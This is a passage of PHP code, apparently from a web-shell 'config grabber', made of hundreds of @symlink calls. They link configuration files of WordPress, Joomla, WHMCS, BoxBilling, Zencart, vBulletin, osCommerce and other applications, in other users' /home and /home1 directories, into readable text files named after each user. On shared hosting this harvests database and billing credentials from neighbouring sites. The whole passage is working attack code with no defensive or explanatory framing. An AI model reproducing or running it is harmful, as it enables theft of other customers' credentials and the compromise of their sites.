  1286. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1287. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1288. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1289. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1290. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1291. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1292. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1293. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1294. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1295. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1296. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1297. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1298. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1299. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1300. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1301. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1302. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1303. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1305. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1389. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1390. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1391. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1392. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1393. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1394. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1395. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1396. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1397. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1398. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1399. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1400. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1401. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1402. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1403. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1404. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1405. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1406. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1407. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1408. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1409. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1410. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1411. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1412. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1413. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1414. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1415. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1416. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1417. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1418. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1419. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1420. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1421. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1422. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1423. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1424. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1425. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1426. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1427. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1428. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1429. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1430.  
  1431. //Home1
  1432.  
  1433. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1434. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1435. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1436. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1437. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1438. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1439. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1440. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1441. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1442. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1443. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1444. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1445. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1446. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1447. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1448. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1449. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1450. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1451. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1452. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1453. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1454. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1455. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1456. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1457. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1458. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1459. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1460. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1461. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1462. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1463. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1464. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1465. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1466. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1467. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1468. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1469. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1470. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1471. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1472. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1473. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1474. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1475. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1476. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1477. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1478. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1479. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1480. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1481. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1482. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1483. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1484. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1572. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1573. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1574. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1575. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1576. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1577. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1578. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1579. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1580. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1581. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1582. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1583. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1584. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1585. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1586. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1587. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1588. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1589. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1590. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1591. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1592. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1593. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
